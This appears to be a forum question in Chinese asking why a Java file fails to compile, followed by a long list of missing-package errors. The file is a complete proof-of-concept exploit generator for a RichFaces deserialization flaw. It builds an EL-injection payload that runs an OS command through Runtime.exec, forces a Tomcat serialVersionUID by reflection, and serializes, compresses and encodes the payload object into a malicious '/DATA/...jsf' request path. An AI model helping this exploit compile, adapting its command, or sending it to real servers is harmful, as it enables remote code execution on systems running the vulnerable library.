我目前正在尝试从下面的源代码运行“ javac Main.java”:
import com.sun.facelets.el.TagMethodExpression;
import com.sun.facelets.el.TagValueExpression;
import com.sun.facelets.tag.Location;
import com.sun.facelets.tag.TagAttribute;
import org.ajax4jsf.resource.UserResource;
import org.ajax4jsf.util.base64.URL64Codec;
import org.jboss.el.MethodExpressionImpl;
import org.jboss.el.ValueExpressionImpl;
import org.jboss.el.parser.*;
import org.jboss.seam.core.Expressions;
import org.richfaces.ui.application.StateMethodExpressionWrapper;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Date;
import java.util.zip.Deflater;
import javax.el.MethodExpression;
import javax.faces.context.FacesContext;
public class Main {
public static void main(String[] args) throws Exception{
String pocEL = "#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"touch /tmp/aaaaa\")}";
// tomcat8.5.24 MethodExpression serialVersionUID
Long MethodExpressionSerialVersionUID = 8163925562047324656L;
Class clazz = Class.forName("javax.el.MethodExpression");
Field field = clazz.getField("serialVersionUID");
field.setAccessible(true);
Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
field.setLong(null, MethodExpressionSerialVersionUID);
// createContent
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
Class cls = Class.forName("javax.faces.component.StateHolderSaver");
Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
ct.setAccessible(true);
Object createContnet = ct.newInstance(null, tagMethodExpression);
//value
Object value = "haveTest";
//modified
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
Object modified = ct.newInstance(null, tagValueExpression);
//expires
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
Object expires = ct.newInstance(null, tagValueExpression2);
//payload object
UserResource.UriData uriData = new UserResource.UriData();
//Constructor con = UserResource.class.getConstructor(new Class[]{});
Field fieldCreateContent = uriData.getClass().getDeclaredField("createContent");
fieldCreateContent.setAccessible(true);
fieldCreateContent.set(uriData, createContnet);
Field fieldValue = uriData.getClass().getDeclaredField("value");
fieldValue.setAccessible(true);
fieldValue.set(uriData, value);
Field fieldModefied = uriData.getClass().getDeclaredField("modified");
fieldModefied.setAccessible(true);
fieldModefied.set(uriData, modified);
Field fieldExpires = uriData.getClass().getDeclaredField("expires");
fieldExpires.setAccessible(true);
fieldExpires.set(uriData, expires);
//encrypt
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(uriData);
objectOutputStream.flush();
objectOutputStream.close();
byteArrayOutputStream.close();
byte[] pocData = byteArrayOutputStream.toByteArray();
Deflater compressor = new Deflater(1);
byte[] compressed = new byte[pocData.length + 100];
compressor.setInput(pocData);
compressor.finish();
int totalOut = compressor.deflate(compressed);
byte[] zipsrc = new byte[totalOut];
System.arraycopy(compressed, 0, zipsrc, 0, totalOut);
compressor.end();
byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
String poc = "/DATA/" + new String(dataArray, "ISO-8859-1") + ".jsf";
System.out.println(poc);
}
}
但是每次我收到以下错误消息:
Main.java:1: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagMethodExpression;
^
Main.java:2: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagValueExpression;
^
Main.java:3: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.Location;
^
Main.java:4: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.TagAttribute;
^
Main.java:5: error: package org.ajax4jsf.resource does not exist
import org.ajax4jsf.resource.UserResource;
^
Main.java:6: error: package org.ajax4jsf.util.base64 does not exist
import org.ajax4jsf.util.base64.URL64Codec;
^
Main.java:7: error: package org.jboss.el does not exist
import org.jboss.el.MethodExpressionImpl;
^
Main.java:8: error: package org.jboss.el does not exist
import org.jboss.el.ValueExpressionImpl;
^
Main.java:9: error: package org.jboss.el.parser does not exist
import org.jboss.el.parser.*;
^
Main.java:10: error: package org.jboss.seam.core does not exist
import org.jboss.seam.core.Expressions;
^
Main.java:11: error: package org.richfaces.ui.application does not exist
import org.richfaces.ui.application.StateMethodExpressionWrapper;
^
Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
^
Main.java:22: error: package javax.faces.context does not exist
import javax.faces.context.FacesContext;
^
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:43: error: cannot find symbol
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
^
symbol: class MethodExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:44: error: cannot find symbol
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
^
symbol: class MethodExpression
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:45: error: cannot find symbol
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
^
symbol: class StateMethodExpressionWrapper
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:46: error: cannot find symbol
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
^
symbol: class Location
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:47: error: cannot find symbol
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:48: error: cannot find symbol
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
^
symbol: class TagMethodExpression
location: class Main
Main.java:51: error: cannot find symbol
Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
^
symbol: class FacesContext
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:59: error: cannot find symbol
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:60: error: cannot find symbol
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:61: error: cannot find symbol
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
^
symbol: class TagValueExpression
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:65: error: cannot find symbol
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
^
symbol: class TagAttribute
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:66: error: cannot find symbol
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
^
symbol: class ValueExpressionImpl
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:67: error: cannot find symbol
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
^
symbol: class TagValueExpression
location: class Main
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:71: error: package UserResource does not exist
UserResource.UriData uriData = new UserResource.UriData();
^
Main.java:103: error: cannot find symbol
byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
^
symbol: variable URL64Codec
location: class Main
42 errors